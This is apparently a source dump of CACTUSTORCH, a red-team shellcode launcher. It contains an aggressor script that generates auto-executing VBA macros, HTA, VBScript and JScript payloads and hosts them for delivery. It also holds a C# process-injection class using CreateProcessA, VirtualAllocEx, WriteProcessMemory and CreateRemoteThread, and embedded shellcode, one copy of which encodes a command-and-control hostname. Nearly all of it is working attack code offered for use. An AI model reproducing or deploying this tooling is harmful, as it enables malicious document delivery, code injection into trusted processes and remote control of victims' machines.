620 | $data = $data . " serialized_obj = serialized_obj & \"00000000006235000000200000000000000000000000000000000000000000000054350000000000000000000000005F436F\"\r\n";
621 | $data = $data . " serialized_obj = serialized_obj & \"72446C6C4D61696E006D73636F7265652E646C6C0000000000FF250020001000000000000000000000000000000000000000\"\r\n";
622 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
623 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
624 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000\"\r\n";
625 | $data = $data . " serialized_obj = serialized_obj & \"0000000000010001000000300000800000000000000000000000000000010000000000480000005840000034030000000000\"\r\n";
626 | $data = $data . " serialized_obj = serialized_obj & \"0000000000340334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00\"\r\n";
627 | $data = $data . " serialized_obj = serialized_obj & \"000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000\"\r\n";
628 | $data = $data . " serialized_obj = serialized_obj & \"000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C00610074\"\r\n";
629 | $data = $data . " serialized_obj = serialized_obj & \"0069006F006E00000000000000B00494020000010053007400720069006E006700460069006C00650049006E0066006F0000\"\r\n";
630 | $data = $data . " serialized_obj = serialized_obj & \"0070020000010030003000300030003000340062003000000030000C00010043006F006D006D0065006E0074007300000043\"\r\n";
631 | $data = $data . " serialized_obj = serialized_obj & \"004100430054005500530054004F00520043004800000022000100010043006F006D00700061006E0079004E0061006D0065\"\r\n";
632 | $data = $data . " serialized_obj = serialized_obj & \"00000000000000000040000C000100460069006C0065004400650073006300720069007000740069006F006E000000000043\"\r\n";
633 | $data = $data . " serialized_obj = serialized_obj & \"004100430054005500530054004F005200430048000000300008000100460069006C006500560065007200730069006F006E\"\r\n";
634 | $data = $data . " serialized_obj = serialized_obj & \"000000000031002E0030002E0030002E003000000040001000010049006E007400650072006E0061006C004E0061006D0065\"\r\n";
635 | $data = $data . " serialized_obj = serialized_obj & \"00000043004100430054005500530054004F005200430048002E0064006C006C0000003C000C0001004C006500670061006C\"\r\n";
636 | $data = $data . " serialized_obj = serialized_obj & \"0043006F007000790072006900670068007400000043004100430054005500530054004F0052004300480000002A00010001\"\r\n";
637 | $data = $data . " serialized_obj = serialized_obj & \"004C006500670061006C00540072006100640065006D00610072006B00730000000000000000004800100001004F00720069\"\r\n";
638 | $data = $data . " serialized_obj = serialized_obj & \"00670069006E0061006C00460069006C0065006E0061006D006500000043004100430054005500530054004F005200430048\"\r\n";
639 | $data = $data . " serialized_obj = serialized_obj & \"002E0064006C006C00000038000C000100500072006F0064007500630074004E0061006D0065000000000043004100430054\"\r\n";
640 | $data = $data . " serialized_obj = serialized_obj & \"005500530054004F005200430048000000340008000100500072006F006400750063007400560065007200730069006F006E\"\r\n";
641 | $data = $data . " serialized_obj = serialized_obj & \"00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C007900200056006500720073\"\r\n";
642 | $data = $data . " serialized_obj = serialized_obj & \"0069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000000000000000000000\"\r\n";
643 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
644 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000C00000074\"\r\n";
645 | $data = $data . " serialized_obj = serialized_obj & \"3500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
646 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
647 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
648 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
649 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
650 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
651 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
652 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
653 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
654 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
655 | $data = $data . " serialized_obj = serialized_obj & \"000000010D00000004000000091700000009060000000916000000061A0000002753797374656D2E5265666C656374696F6E\"\r\n";
656 | $data = $data . " serialized_obj = serialized_obj & \"2E417373656D626C79204C6F616428427974655B5D29080000000A0B\"\r\n";
657 | $data = $data . " entry_class = \"cactusTorch\"\r\n";
658 | $data = $data . " Dim stm As Object, fmt As Object, al As Object\r\n";
659 | $data = $data . " Set stm = CreateObject(\"System.IO.MemoryStream\")\r\n";
660 | $data = $data . " Set fmt = CreateObject(\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\")\r\n";
661 | $data = $data . " Set al = CreateObject(\"System.Collections.ArrayList\")\r\n";
662 | $data = $data . " Dim dec\r\n";
663 | $data = $data . " dec = decodeHex(serialized_obj)\r\n";
664 | $data = $data . " For Each i In dec\r\n";
665 | $data = $data . " stm.WriteByte i\r\n";
666 | $data = $data . " Next i\r\n";
667 | $data = $data . " stm.Position = 0\r\n";
668 | $data = $data . " Dim n As Object, d As Object, o As Object\r\n";
669 | $data = $data . " Set n = fmt.SurrogateSelector\r\n";
670 | $data = $data . " Set d = fmt.Deserialize_2(stm)\r\n";
671 | $data = $data . " al.Add n\r\n";
672 | $data = $data . " Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)\r\n";
673 | $data = $data . " o.flame binary,code\r\n";
674 | $data = $data . "End Function\r\n";
675 | $data = $data . "Sub Workbook_Open()\r\n";
676 | $data = $data . "Init\r\n";
677 | $data = $data . "Run\r\n";
678 | $data = $data . "End Sub\r\n";
679 | $data = $data . "Sub AutoOpen()\r\n";
680 | $data = $data . "Init\r\n";
681 | $data = $data . "Run\r\n";
682 | $data = $data . "End Sub\r\n";
683 | $data = $data . "Sub Auto_Open()\r\n";
684 | $data = $data . "AutoOpen\r\n";
685 | $data = $data . "End Sub";
686 |
687 | }
688 |
689 | # $data is ready here
690 |
691 | # Add to make HTA
692 |
693 | if (%options["type"] eq "HTA"){
694 | $data = "";
695 | }
696 |
697 | $url = "";
698 | # begin hosting it
699 |
700 | if (%options["type"] eq "VBScript"){
701 | # host VBScript
702 | $url = site_host(%options["host"], %options["port"], %options["uri"], $data, "application/x-vbs");
703 | prompt_text("Payload: ", $url, {});
704 | }
705 | else if(%options["type"] eq "HTA"){
706 | # host HTA
707 | $url = site_host(%options["host"], %options["port"], %options["uri"], $data, "application/hta");
708 | prompt_text("Payload: ", $url, {});
709 | }
710 | else if(%options["type"] eq "JScript") {
711 | # host JScript
712 | $url = site_host(%options["host"], %options["port"], %options["uri"], $data, "application/octet-stream");
713 | prompt_text("Payload: ", $url, {});
714 | }
715 | else{
716 | # Split out VBA Macro to copy
717 | $url = $data;
718 | [dialog.DialogUtils addToClipboard: $data];
719 | }
720 |
721 | # tell the user our URL
722 |
723 |
724 | }
725 |
726 | # create a popup menu!
727 | popup attacks {
728 | item "Host CACTUSTORCH Payload" {
729 | local('$dialog %defaults');
730 |
731 | # setup our defaults
732 | %defaults["uri"] = "/a";
733 | %defaults["host"] = localip();
734 | %defaults["port"] = 80;
735 | %defaults["stageless"] = "true";
736 | %defaults["binary"] = "rundll32.exe";
737 |
738 | # create our dialog
739 | $dialog = dialog("Host CACTUSTORCH Payload", %defaults, &setup_attack);
740 | dialog_description($dialog, "Host a CACTUSTORCH Payload");
741 | drow_text($dialog, "uri", "URI Path: ", 20);
742 | drow_text($dialog, "host", "Local Host: ");
743 | drow_text($dialog, "port", "Local Port: ");
744 | drow_listener_stage($dialog, "listener", "Listener: "); # can't gen stageless payloads for other team servers.
745 | drow_checkbox($dialog, "stageless", "Stageless: ", "Use Stageless Payload");
746 | drow_text($dialog, "binary", "Binary: ");
747 | drow_combobox($dialog, "type", "Type: ", @("VBScript", "JScript", "HTA", "VBA Macro"));
748 | dbutton_action($dialog, "Launch");
749 |
750 | # show our dialog
751 | dialog_show($dialog);
752 | }
753 | }
--------------------------------------------------------------------------------
/CACTUSTORCH.cs/TestClass.cs:
--------------------------------------------------------------------------------
1 | // This file is part of DotNetToJScript.
2 | // Copyright (C) James Forshaw 2017
3 | //
4 | // DotNetToJScript is free software: you can redistribute it and/or modify
5 | // it under the terms of the GNU General Public License as published by
6 | // the Free Software Foundation, either version 3 of the License, or
7 | // (at your option) any later version.
8 | //
9 | // DotNetToJScript is distributed in the hope that it will be useful,
10 | // but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | // GNU General Public License for more details.
13 | //
14 | // You should have received a copy of the GNU General Public License
15 | // along with DotNetToJScript. If not, see .
16 |
17 | using System.Diagnostics;
18 | using System.Runtime.InteropServices;
19 | using System.Windows.Forms;
20 | using System;
21 | using System.Text;
22 |
23 | [ComVisible(true)]
24 | public class cactusTorch
25 | {
26 |
27 | [StructLayout(LayoutKind.Sequential)]
28 | public class SecurityAttributes
29 | {
30 | public Int32 Length = 0;
31 | public IntPtr lpSecurityDescriptor = IntPtr.Zero;
32 | public bool bInheritHandle = false;
33 |
34 | public SecurityAttributes()
35 | {
36 | this.Length = Marshal.SizeOf(this);
37 | }
38 | }
39 |
40 | [StructLayout(LayoutKind.Sequential)]
41 | public struct ProcessInformation
42 | {
43 | public IntPtr hProcess;
44 | public IntPtr hThread;
45 | public Int32 dwProcessId;
46 | public Int32 dwThreadId;
47 | }
48 |
49 | [Flags]
50 | public enum CreateProcessFlags : uint
51 | {
52 | DEBUG_PROCESS = 0x00000001,
53 | DEBUG_ONLY_THIS_PROCESS = 0x00000002,
54 | CREATE_SUSPENDED = 0x00000004,
55 | DETACHED_PROCESS = 0x00000008,
56 | CREATE_NEW_CONSOLE = 0x00000010,
57 | NORMAL_PRIORITY_CLASS = 0x00000020,
58 | IDLE_PRIORITY_CLASS = 0x00000040,
59 | HIGH_PRIORITY_CLASS = 0x00000080,
60 | REALTIME_PRIORITY_CLASS = 0x00000100,
61 | CREATE_NEW_PROCESS_GROUP = 0x00000200,
62 | CREATE_UNICODE_ENVIRONMENT = 0x00000400,
63 | CREATE_SEPARATE_WOW_VDM = 0x00000800,
64 | CREATE_SHARED_WOW_VDM = 0x00001000,
65 | CREATE_FORCEDOS = 0x00002000,
66 | BELOW_NORMAL_PRIORITY_CLASS = 0x00004000,
67 | ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000,
68 | INHERIT_PARENT_AFFINITY = 0x00010000,
69 | INHERIT_CALLER_PRIORITY = 0x00020000,
70 | CREATE_PROTECTED_PROCESS = 0x00040000,
71 | EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
72 | PROCESS_MODE_BACKGROUND_BEGIN = 0x00100000,
73 | PROCESS_MODE_BACKGROUND_END = 0x00200000,
74 | CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
75 | CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
76 | CREATE_DEFAULT_ERROR_MODE = 0x04000000,
77 | CREATE_NO_WINDOW = 0x08000000,
78 | PROFILE_USER = 0x10000000,
79 | PROFILE_KERNEL = 0x20000000,
80 | PROFILE_SERVER = 0x40000000,
81 | CREATE_IGNORE_SYSTEM_DEFAULT = 0x80000000,
82 | }
83 |
84 | [Flags]
85 | public enum DuplicateOptions : uint
86 | {
87 | DUPLICATE_CLOSE_SOURCE = 0x00000001,
88 | DUPLICATE_SAME_ACCESS = 0x00000002
89 | }
90 |
91 | [StructLayout(LayoutKind.Sequential)]
92 | public class StartupInfo
93 | {
94 | public Int32 cb = 0;
95 | public IntPtr lpReserved = IntPtr.Zero;
96 | public IntPtr lpDesktop = IntPtr.Zero; // MUST be Zero
97 | public IntPtr lpTitle = IntPtr.Zero;
98 | public Int32 dwX = 0;
99 | public Int32 dwY = 0;
100 | public Int32 dwXSize = 0;
101 | public Int32 dwYSize = 0;
102 | public Int32 dwXCountChars = 0;
103 | public Int32 dwYCountChars = 0;
104 | public Int32 dwFillAttribute = 0;
105 | public Int32 dwFlags = 0;
106 | public Int16 wShowWindow = 0;
107 | public Int16 cbReserved2 = 0;
108 | public IntPtr lpReserved2 = IntPtr.Zero;
109 | public IntPtr hStdInput = IntPtr.Zero;
110 | public IntPtr hStdOutput = IntPtr.Zero;
111 | public IntPtr hStdError = IntPtr.Zero;
112 |
113 | public StartupInfo()
114 | {
115 | this.cb = Marshal.SizeOf(this);
116 | }
117 | }
118 |
119 | [Flags()]
120 | public enum AllocationType : uint
121 | {
122 | COMMIT = 0x1000,
123 | RESERVE = 0x2000,
124 | GO = 0x3000,
125 | RESET = 0x80000,
126 | LARGE_PAGES = 0x20000000,
127 | PHYSICAL = 0x400000,
128 | TOP_DOWN = 0x100000,
129 | WRITE_WATCH = 0x200000
130 | }
131 |
132 |
133 | [Flags()]
134 | public enum MemoryProtection : uint
135 | {
136 | EXECUTE = 0x10,
137 | EXECUTE_READ = 0x20,
138 | EXECUTE_READWRITE = 0x40,
139 | EXECUTE_WRITECOPY = 0x80,
140 | NOACCESS = 0x01,
141 | READONLY = 0x02,
142 | READWRITE = 0x04,
143 | WRITECOPY = 0x08,
144 | GUARD_Modifierflag = 0x100,
145 | NOCACHE_Modifierflag = 0x200,
146 | WRITECOMBINE_Modifierflag = 0x400
147 | }
148 |
149 | // CreateProcessA
150 | [DllImport("kernel32.dll")]
151 | public static extern IntPtr CreateProcessA(
152 | String lpApplicationName,
153 | String lpCommandLine,
154 | SecurityAttributes lpProcessAttributes,
155 | SecurityAttributes lpThreadAttributes,
156 | Boolean bInheritHandles,
157 | CreateProcessFlags dwCreationFlags,
158 | IntPtr lpEnvironment,
159 | String lpCurrentDirectory,
160 | [In] StartupInfo lpStartupInfo,
161 | out ProcessInformation lpProcessInformation
162 |
163 | );
164 |
165 | // VirtualAllocEx
166 | [DllImport("kernel32.dll")]
167 | public static extern IntPtr VirtualAllocEx(
168 | IntPtr lpHandle,
169 | IntPtr lpAddress,
170 | IntPtr dwSize,
171 | AllocationType flAllocationType,
172 | MemoryProtection flProtect
173 | );
174 |
175 | // WriteProcessMemory
176 | [DllImport("kernel32.dll")]
177 | public static extern bool WriteProcessMemory(
178 | IntPtr hProcess,
179 | IntPtr lpBaseAddress,
180 | byte[] buffer,
181 | IntPtr dwSize,
182 | int lpNumberOfBytesWritten);
183 |
184 | // TerminateProcess
185 |
186 | [DllImport("kernel32.dll")]
187 | public static extern bool TerminateProcess(
188 | IntPtr hProcess,
189 | uint uExitCode);
190 |
191 | // CreateRemoteThread
192 | [DllImport("kernel32.dll")]
193 | static extern IntPtr CreateRemoteThread(
194 | IntPtr hProcess,
195 | IntPtr lpThreadAttributes,
196 | uint dwStackSize,
197 | IntPtr lpStartAddress,
198 | IntPtr lpParameter,
199 | uint dwCreationFlags,
200 | IntPtr lpThreadId);
201 |
202 | public cactusTorch()
203 | {
204 | //MessageBox.Show("Test", "Test", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
205 | }
206 |
207 | public void flame(string binary, string shellcode32)
208 | {
209 | // Written by Vincent Yiu (@vysecurity)
210 |
211 | // shellcode contains base64 shellcode
212 | // binary contains binary to inject into
213 |
214 | byte[] sc = Convert.FromBase64String(shellcode32);
215 | //byte[] sc = new byte[540] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0xe8, 0x80, 0x00, 0x00, 0x00, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x39, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x30, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x35, 0x2e, 0x30, 0x3b, 0x20, 0x42, 0x4f, 0x31, 0x49, 0x45, 0x38, 0x5f, 0x76, 0x31, 0x3b, 0x45, 0x4e, 0x55, 0x53, 0x29, 0x00, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x00, 0x59, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x51, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xeb, 0x79, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x50, 0x00, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x62, 0x59, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x52, 0x51, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x44, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xbc, 0x31, 0xff, 0xeb, 0x15, 0xeb, 0x49, 0xe8, 0x99, 0xff, 0xff, 0xff, 0x2f, 0x6b, 0x4a, 0x5a, 0x4d, 0x00, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0x53, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xcd, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0x37, 0xff, 0xff, 0xff, 0x6d, 0x61, 0x6c, 0x77, 0x61, 0x72, 0x65, 0x63, 0x32, 0x2e, 0x76, 0x69, 0x6e, 0x63, 0x65, 0x6e, 0x74, 0x79, 0x69, 0x75, 0x2e, 0x63, 0x6f, 0x2e, 0x75, 0x6b, 0x00 };
216 | IntPtr size = new IntPtr(sc.Length);
217 | StartupInfo sInfo = new StartupInfo();
218 | sInfo.dwFlags = 0;
219 | ProcessInformation pInfo;
220 | string binaryPath = "";
221 | // We check what architecture OS it is here
222 |
223 | if (Environment.GetEnvironmentVariable("ProgramW6432").Length > 0)
224 | {
225 | //64 bit
226 | binaryPath = Environment.GetEnvironmentVariable("windir") + "\\SysWOW64\\" + binary;
227 | }
228 | else
229 | {
230 | //32 bit
231 | binaryPath = Environment.GetEnvironmentVariable("windir") + "\\System32\\" + binary;
232 | }
233 |
234 | // We have select the correct directory, for the executeable
235 |
236 | // Create the Process in SUSPENDED state
237 | IntPtr funcAddr = CreateProcessA(binaryPath, null, null, null, true, CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo);
238 | IntPtr hProcess = pInfo.hProcess;
239 | if (hProcess != IntPtr.Zero) {
240 | //MessageBox.Show("hProcess: " + hProcess.ToString("X8"));
241 | // Use VirtualAllocEx to create some space
242 |
243 | IntPtr spaceAddr = VirtualAllocEx(hProcess, new IntPtr(0), size, AllocationType.GO, MemoryProtection.EXECUTE_READWRITE);
244 |
245 | //MessageBox.Show("Virtual Alloc: " + spaceAddr.ToString("X8"));
246 |
247 | if (spaceAddr == IntPtr.Zero)
248 | {
249 | // TerminateProcess incase failed to Valloc for some reason.
250 | TerminateProcess(hProcess, 0);
251 | }
252 | else
253 | {
254 | // Use WriteProcessMemory to WRITE "POKEMON" in
255 | int test = 0;
256 |
257 | IntPtr size2 = new IntPtr(sc.Length);
258 | bool bWrite = WriteProcessMemory(hProcess, spaceAddr, sc, size2, test);
259 |
260 | //MessageBox.Show("WriteProcessMemory: " + bWrite.ToString());
261 |
262 | // CreateRemoteThread to start it up
263 | CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0));
264 |
265 | }
266 | }
267 |
268 |
269 | //Process.Start(shellcode);
270 | }
271 | }
272 |
273 |
--------------------------------------------------------------------------------
/CACTUSTORCH.hta:
--------------------------------------------------------------------------------
1 |
230 |
--------------------------------------------------------------------------------
/CACTUSTORCH.js:
--------------------------------------------------------------------------------
1 | /*
2 | ( ) ( )
3 | ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /(
4 | )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\())
5 | (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\
6 | )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_)
7 | ((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || |
8 | | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ |
9 | \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_|
10 |
11 | Author: Vincent Yiu (@vysecurity)
12 | Credits:
13 | - @cn33liz: Inspiration with StarFighter
14 | - @tiraniddo: James Forshaw for DotNet2JScript
15 | - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into
16 |
17 | A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.
18 |
19 | Usage:
20 | Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example...
21 | Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework
22 | Run: cat payload.bin | base64 -w 0
23 | Copy the base64 encoded payload into the code variable below.
24 |
25 | */
26 |
27 | // Replace binary with a executable in both SYSTEM32 and SYSWOW64 that you want to use as container. eg. notepad.exe, calc.exe
28 | var binary = "rundll32.exe";
29 |
30 | // Replace code with base64 encoded 32 bit shellcode
31 | var code = "/EiD5PDoyAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwJ1couAiAAAAEiFwHRnSAHQUItIGESLQCBJAdDjVkj/yUGLNIhIAdZNMclIMcCsQcHJDUEBwTjgdfFMA0wkCEU50XXYWESLQCRJAdBmQYsMSESLQBxJAdBBiwSISAHQQVhBWF5ZWkFYQVlBWkiD7CBBUv/gWEFZWkiLEulP////XWoASb53aW5pbmV0AEFWSYnmTInxQbpMdyYH/9VIMclIMdJNMcBNMclBUEFQQbo6Vnmn/9XpkwAAAFpIicFBuLgiAABNMclBUUFRagNBUUG6V4mfxv/V63lbSInBSDHSSYnYTTHJUmgAMsCEUlJBuutVLjv/1UiJxkiDw1BqCl9IifG6HwAAAGoAaIAzAABJieBBuQQAAABBunVGnob/1UiJ8UiJ2knHwP////9NMclSUkG6LQYYe//VhcAPhZ0BAABI/88PhIwBAADrs+nkAQAA6IL///8vbFAzbgBGtGdlL+0lbIwTsleMxu8gIc1SFhMSp/2BbxWcIVr41lazhw+5gJ2OSB39Q8/NlzjDBE5ec4+EGSnG4qriFEtaeGzaVZiJTQ6IAFVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDEwLjA7IFdpbmRvd3MgTlQgNi4yOyBXT1c2NDsgVHJpZGVudC82LjA7IE1BR1dKUykNCgDOyu0iiKeM7hBliZuzyxEwqJsONMBTeCAA3hGauNHQmgjIFvML90/LQq2N19TDdcGSp0jZAyisaroMs17IE7v4qHXwljzLleOMpu317o7V9o2c3xaMDq3B1SwoyUEZFUUCB4TczmHXh3FsVNT1XE8kWzV4mxvnWTlrpP1XPT72Ozz1tHajTACwSXjNEWnMJYgiKHcLbBkZifYDcLBDMNoXM6tlCm3slnZVVx/+HgvcPkYsIqJytc2ZaHB7cyyjyDfLpirOlKyC7WM+Kfhc7fzr0QBBvvC1olb/1UgxyboAAEAAQbgAEAAAQblAAAAAQbpYpFPl/9VIk1NTSInnSInxSInaQbgAIAAASYn5QboSloni/9VIg8QghcB0tmaLB0gBw4XAdd";
32 |
33 |
34 | // ------------ DO NOT EDIT BELOW HERE --------------
35 |
36 | function setversion() {
37 | }
38 | function debug(s) {}
39 | function base64ToStream(b) {
40 | var enc = new ActiveXObject("System.Text.ASCIIEncoding");
41 | var length = enc.GetByteCount_2(b);
42 | var ba = enc.GetBytes_4(b);
43 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
44 | ba = transform.TransformFinalBlock(ba, 0, length);
45 | var ms = new ActiveXObject("System.IO.MemoryStream");
46 | ms.Write(ba, 0, (length / 4) * 3);
47 | ms.Position = 0;
48 | return ms;
49 | }
50 |
51 | var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
52 | "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
53 | "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
54 | "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
55 | "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
56 | "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
57 | "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
